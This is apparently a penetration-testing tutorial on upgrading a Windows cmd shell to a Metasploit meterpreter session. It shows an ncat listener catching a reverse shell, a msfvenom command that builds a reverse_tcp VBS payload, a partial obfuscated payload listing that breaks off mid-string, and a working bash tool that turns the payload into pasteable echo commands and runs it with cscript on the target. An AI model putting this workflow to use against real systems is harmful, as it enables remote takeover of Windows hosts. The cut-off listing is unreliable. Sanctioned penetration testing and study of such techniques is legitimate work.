Executing a Metasploit VBS payload from a cmd shell
If you are a penetration tester or researcher, you will sometimes want to get a meterpreter session out of a plain cmd shell, for example one obtained through sqlmap --os-shell or a similar tool. Example:
$ ncat -l -p 4444
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\test\Desktop>ver
ver
Microsoft Windows XP [Version 5.1.2600]

C:\Documents and Settings\test\Desktop>
Until now you had to try methods like these:
- A. Convert the exe into a batch script.
- B. Download the payload file from a remote server (FTP, TFTP, HTTP, etc.).
- C. …
Now I will show you how to run a Metasploit payload inside cmd.exe. Think about the following two questions:
- How do you generate the payload with msfvenom?
- How do you run the payload in a simple, compatible way?
How do you generate the payload with msfvenom?
To test the payload on Windows XP/2003 we choose the vbs format. If you need help, try msfvenom -h.
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f vbs --arch x86 --platform win
No encoder or badchars specified, outputting raw payload
Payload size: 333 bytes
Final size of vbs file: 7370 bytes
Function oSpLpsWeU(XwXDDtdR)
    urGQiYVn = "<B64DECODE xmlns:dt=" & Chr(34) & "urn:schemas-microsoft-com:datatypes" & Chr(34) & " " & _
    "dt:dt=" & Chr(34) & "bin.base64" & Chr(34) & ">" & _
    XwXDDtdR & "</B64DECODE>"
    Set gFMdOBBiLZ = CreateObject("MSXML2.DOMDocument.3.0")
    gFMdOBBiLZ.LoadXML(urGQiYVn)
    oSpLpsWeU = gFMdOBBiLZ.selectsinglenode("B64DECODE").nodeTypedValue
    set gFMdOBBiLZ = nothing
End Function

Function skbfzWOqR()
    cTENSbYbnWY = "
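One way to get the generated .vbs onto the target using nothing but the interactive cmd shell is to rebuild it line by line with echo and then launch it with cscript. The script below is an added example, not code from the original post or from Metasploit: it converts a msfvenom-generated .vbs into a list of cmd.exe commands you can paste into the ncat session. It assumes the target path %TEMP%\p.vbs and a 1024-character chunk size (both arbitrary), and the sample .vbs it builds for the demonstration is a constructed stand-in for msfvenom's output with a fake blob, not a real payload.

```bash
#!/usr/bin/env bash
# Convert a msfvenom-generated .vbs into cmd.exe "echo" commands that recreate
# the file on the target, so the whole thing can be pasted into an interactive
# cmd shell (e.g. one reached over ncat or sqlmap --os-shell).

# Chunk size (assumed) for the long base64 line: keeps every echo well under
# cmd's 8191-character command-line limit even after caret escaping.
CHUNK=${CHUNK:-1024}

# Escape one line for an UNQUOTED cmd.exe echo argument. Every cmd
# metacharacter, including the double quote, is caret-escaped, so cmd never
# enters quote mode and never sees & | < > ( ) as an operator. (% and ! are
# not escaped: msfvenom's vbs template and base64 contain neither, %name%
# would expand, and delayed expansion is off by default.)
cmd_escape() {
  local s=$1 c
  s=${s//^/^^}                       # carets first, they are the escape char
  for c in '&' '|' '<' '>' '(' ')' '"'; do
    s=${s//"$c"/^$c}
  done
  printf '%s' "$s"
}

# msfvenom puts the whole base64 exe in one string literal on one line:
#   name = "AAAA...."
# Split it into separate statements rather than " & _" continuations, which
# sidesteps VBScript's limit on continued lines in a single statement:
#   name = "AAAA"            (first chunk)
#   name = name & "BBBB"     (each following chunk)
split_long_assignment() {
  local line=$1
  local re='^[[:space:]]*([A-Za-z_][A-Za-z0-9_]*)[[:space:]]*=[[:space:]]*"([A-Za-z0-9+/=]+)"[[:space:]]*$'
  if [[ $line =~ $re ]] && (( ${#line} > CHUNK )); then
    local name=${BASH_REMATCH[1]} data=${BASH_REMATCH[2]} first=1
    while [[ -n $data ]]; do
      if (( first )); then
        printf '%s = "%s"\n' "$name" "${data:0:CHUNK}"; first=0
      else
        printf '%s = %s & "%s"\n' "$name" "$name" "${data:0:CHUNK}"
      fi
      data=${data:CHUNK}
    done
  else
    printf '%s\n' "$line"
  fi
}

# usage: vbs_to_cmd payload.vbs [target-path]   -> commands on stdout
vbs_to_cmd() {
  local src=$1 dst=${2:-'%TEMP%\p.vbs'} line out
  while IFS= read -r line || [[ -n $line ]]; do
    line=${line%$'\r'}                      # drop the CR of CRLF output
    line=${line#"${line%%[![:space:]]*}"}   # leading indentation is not significant in VBS
    split_long_assignment "$line" | while IFS= read -r out; do
      # Redirection goes FIRST so a line ending in a digit is never parsed as a
      # handle redirect ("2>>"); "echo." prints even an empty line and never
      # toggles echo on/off.
      printf '>>%s echo.%s\n' "$dst" "$(cmd_escape "$out")"
    done
  done < "$src"
  printf 'cscript //nologo %s\n' "$dst"
}

# Constructed sample with the shape of msfvenom's vbs template and a fake
# 1600-character blob (NOT a real payload), used only to demonstrate the tool.
make_sample_vbs() {
  local f=$1 blob= i
  for ((i = 0; i < 400; i++)); do blob+=QUJD; done
  {
    printf 'Function b64dec(s)\r\n'
    printf '\tx = "<B64DECODE xmlns:dt=" & Chr(34) & "urn:schemas-microsoft-com:datatypes" & Chr(34) & ">" & _\r\n'
    printf '\ts & "</B64DECODE>"\r\n'
    printf 'End Function\r\n'
    printf 'Function run()\r\n'
    printf '\tblob = "%s"\r\n' "$blob"
    printf 'End Function\r\n'
    printf 'run\r\n'
  } > "$f"
}

# Stand-alone demo: build the sample and print the commands to paste.
if [[ ${BASH_SOURCE[0]} == "$0" ]]; then
  tmp=$(mktemp -d)
  make_sample_vbs "$tmp/sample.vbs"
  vbs_to_cmd "$tmp/sample.vbs"
fi
```

Run it against the real file (vbs_to_cmd payload.vbs) and paste the output into the cmd session; the last line runs the script with cscript. Note that msfvenom's vbs template runs the dropped exe with wait set to true, so the cmd shell blocks for as long as the meterpreter process lives; launch it with start /b cscript //nologo %TEMP%\p.vbs instead if you want to keep using the shell.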